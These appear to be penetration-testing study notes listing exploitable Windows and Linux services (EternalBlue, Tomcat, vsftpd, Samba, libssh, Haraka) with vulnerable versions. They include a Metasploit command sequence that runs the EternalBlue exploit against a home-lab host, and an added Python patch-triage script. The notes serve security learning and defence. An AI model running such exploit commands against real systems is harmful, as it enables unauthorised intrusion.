# Exploitation

## Windows Exploitation

### HFS (HTTP File Server)
HFS (HTTP File Server) is a web server for sharing files and documents.

Rejetto HFS is a free, open source HTTP file server.
### SMB - MS17-010 EternalBlue
EternalBlue takes advantage of a vulnerability in the Windows SMBv1 protocol. A patch was released in March 2017.
🔬 Check the Lab 2 - Eternal Blue here
Some useful MSF commands from my Home Lab (Kali VM + Win 2008_R2 Server):

```shell
service postgresql start && msfconsole -q
db_status
setg RHOSTS 192.168.31.131
setg RHOST 192.168.31.131
workspace -a EternalBlue
db_nmap -sS -sV -O 192.168.31.131
search type:auxiliary EternalBlue
use auxiliary/scanner/smb/smb_ms17_010
options
run
search type:exploit EternalBlue
use exploit/windows/smb/ms17_010_eternalblue
options
run
```
### WinRM
Identify WinRM users with MSF and gain access over WinRM by obtaining valid credentials.
The default WinRM ports are TCP 5985 (HTTP) and TCP 5986 (HTTPS).
### Apache Tomcat

Apache Tomcat is a free, open source Java servlet web server, built to host dynamic websites and web apps developed in Java.
Tomcat's default TCP port is 8080. The Apache HTTP Server, by contrast, hosts HTML/PHP web apps.
Apache Tomcat < v.8.5.23 is vulnerable to a JSP upload bypass / RCE.
## Linux Exploitation

### FTP

vsftpd is a Unix FTP server.
vsftpd v.2.3.4 is vulnerable to a command execution vulnerability.
### SAMBA

Samba is the Linux implementation of SMB.
Samba v.3.5.0 is vulnerable to an RCE vulnerability.
### SSH

libssh is a C library that implements the SSHv2 protocol.
SSH's default TCP port is 22.
libssh v.0.6.0 - 0.8.0 is vulnerable to an authentication bypass vulnerability.
### SMTP

Haraka is an open source, high-performance SMTP server developed in Node.js.
SMTP's default TCP port is 25; other TCP ports are 465 and 587.
Haraka prior to v.2.8.9 is vulnerable to command injection.
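The version thresholds collected on this page (Tomcat, vsftpd, Samba, libssh and Haraka) are most useful on the defending side as a patch-triage list: given a service inventory, which hosts are still running a version the page flags? The following Python script is an added example, not code from the original page or from any of the projects named on it. It encodes only the thresholds as the page states them (not a full advisory database), parses a constructed `key=value` inventory, and returns the entries that need patching. The inventory lines, hostnames and the `VULNERABLE` table are assumptions made for the example.

```python
"""Version-based patch triage for the services listed on this page (added example)."""
import re

# Vulnerable version conditions exactly as this page states them (constructed
# table for the example; it is not an authoritative advisory feed).
# Each entry: product -> (kind, low, high) where kind is
#   "lt"    : version <  high
#   "eq"    : version == low
#   "range" : low <= version <= high
VULNERABLE = {
    "tomcat": ("lt", None, "8.5.23"),       # JSP upload bypass / RCE below 8.5.23
    "vsftpd": ("eq", "2.3.4", None),        # command execution in 2.3.4
    "samba":  ("eq", "3.5.0", None),        # RCE in 3.5.0
    "libssh": ("range", "0.6.0", "0.8.0"),  # authentication bypass 0.6.0 - 0.8.0
    "haraka": ("lt", None, "2.8.9"),        # command injection prior to 2.8.9
}


def parse_version(text):
    """Turn '8.5.23' or 'v2.3.4' into a tuple of ints so versions order correctly
    (plain string comparison would put '8.5.9' after '8.5.23')."""
    nums = re.findall(r"\d+", text)
    if not nums:
        raise ValueError(f"no version digits in {text!r}")
    return tuple(int(n) for n in nums)


def is_vulnerable(product, version):
    """True if (product, version) falls inside the page's stated vulnerable versions.
    Products the page does not cover are reported as not vulnerable."""
    rule = VULNERABLE.get(product.lower())
    if rule is None:
        return False
    kind, low, high = rule
    v = parse_version(version)
    if kind == "lt":
        return v < parse_version(high)
    if kind == "eq":
        return v == parse_version(low)
    return parse_version(low) <= v <= parse_version(high)


# Constructed inventory in the shape a scanner export might be normalised to.
INVENTORY = """\
host=10.0.0.5 port=8080 product=tomcat version=8.5.11
host=10.0.0.5 port=8080 product=tomcat version=9.0.40
host=10.0.0.7 port=21 product=vsftpd version=2.3.4
host=10.0.0.7 port=445 product=samba version=4.10.0
host=10.0.0.9 port=22 product=libssh version=0.7.5
host=10.0.0.9 port=25 product=haraka version=2.8.9
host=10.0.0.9 port=3306 product=mysql version=5.7.0
"""


def triage(inventory):
    """Return (host, port, product, version) for every entry the page flags as vulnerable.
    Lines without a product/version pair are skipped rather than failing the run."""
    findings = []
    for line in inventory.splitlines():
        if not line.strip():
            continue
        fields = dict(kv.split("=", 1) for kv in line.split() if "=" in kv)
        product, version = fields.get("product"), fields.get("version")
        if product is None or version is None:
            continue
        if is_vulnerable(product, version):
            findings.append((fields.get("host", "?"), int(fields.get("port", 0)),
                             product, version))
    return findings


if __name__ == "__main__":
    for host, port, product, version in triage(INVENTORY):
        print(f"PATCH {host}:{port} {product} {version}")
```

Only the libssh rule is a closed range; the others are a single version or an upper bound, so a host on exactly the fixed version (Haraka 2.8.9 in the sample) is correctly left off the list. Extending the table to the real advisory ranges is a one-line change per product once those are confirmed from the vendor.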